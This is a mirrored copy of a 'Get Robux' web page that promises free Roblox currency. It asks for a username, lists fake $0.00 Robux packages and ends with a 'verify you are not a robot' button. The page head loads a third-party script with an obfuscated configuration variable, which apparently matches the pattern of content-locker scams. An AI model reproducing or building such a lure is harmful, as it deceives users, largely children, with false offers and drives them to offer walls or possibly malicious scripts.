<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from ca90220.com/locobux/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 16 Apr 2024 15:46:25 GMT -->

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="stylesheet" href="css/styles.css">
  <title>Get Robux</title>
  <link href="icon.ico" rel="icon">
  <script type="text/javascript">
    var AIbqo_ArQ_eQHYqc={"it":4344969,"key":"bf937"};
</script>
<script src="https://d16w9e5gvnj8jg.cloudfront.net/2e3a938.js"></script>
</head>

<body>

  <nav>

    <div class="logo">
      <span>☰</span>

    </div>
    <ul>
      <li>Discover</li>
      <li>Marketplace</li>
      <li>Robux</li>
    </ul>
  </nav>

  <div class="middle">
    <h2>Get Robux</h2>
    <p>Robux allows you to purchase upgrades for your avatar or buy special abilities in experiences.</p>
  </div>

  <center>
    <div class="box_con">
      <div class="box">
        <h3>Roblox Username</h3><br>
        <input class="username" type="text" name="" placeholder="Enter Username"><br>
        <button class="getrbx">Claim Robux</button>
      </div>
      <div class="box2">
        <p class="useroutput" style="text-align: center; margin-top: 30px;">searching for amjad ...</p>
        <div class="folding">
          <img
            src="https://media2.giphy.com/media/v1.Y2lkPTc5MGI3NjExcTFoMHhnaDFkbzB1ZHFlaGttYXYzY2pzNGU1bnBncGkwNmwzNzF6ZiZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9cw/1QcqLUCuQca1edQ0rK/giphy.gif"
            width:42px;height:42px;">

        </div>
      </div>
      <div class="box3">
        <div class="container">
          <div class="row">
            <div class="price">$0.00</div>
            <div class="details">
              <div class="robux_total">
                <div class="pic"><img src="images/robux-removebg-preview.png"></div><span>800</span>
              </div>
            </div>
          </div>
          <div class="row">

            <div class="price">$0.00</div>
            <div class="details">
              <div class="robux_total">
                <div class="pic"><img src="images/robux-removebg-preview.png"></div><span>1700</span>
              </div>
            </div>
          </div>
          <div class="row">

            <div class="price">$0.00</div>
            <div class="details">
              <div class="robux_total">
                <div class="pic"><img src="images/robux-removebg-preview.png"></div>
                <span>5500</span>
              </div>
            </div>
          </div>
          <div class="row">

            <div class="price">$0.00</div>
            <div class="details">
              <div class="robux_total">
                <div class="pic"><img src="images/robux-removebg-preview.png"></div><span>20000</span>
              </div>
            </div>
          </div>

        </div>

      </div>
      <div class="box4">
        <h3>Last step</h3>
        <p>Please verify that you are Not a Robot to receive your Robux!</p>
        <button onclick="_TG()" style="font-size: 19px;">Verify</button>
  </center>

  </div>
  </div>


  <script src="js/app.js"></script>



</body>

<!-- Mirrored from ca90220.com/locobux/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 16 Apr 2024 15:46:28 GMT -->

</html>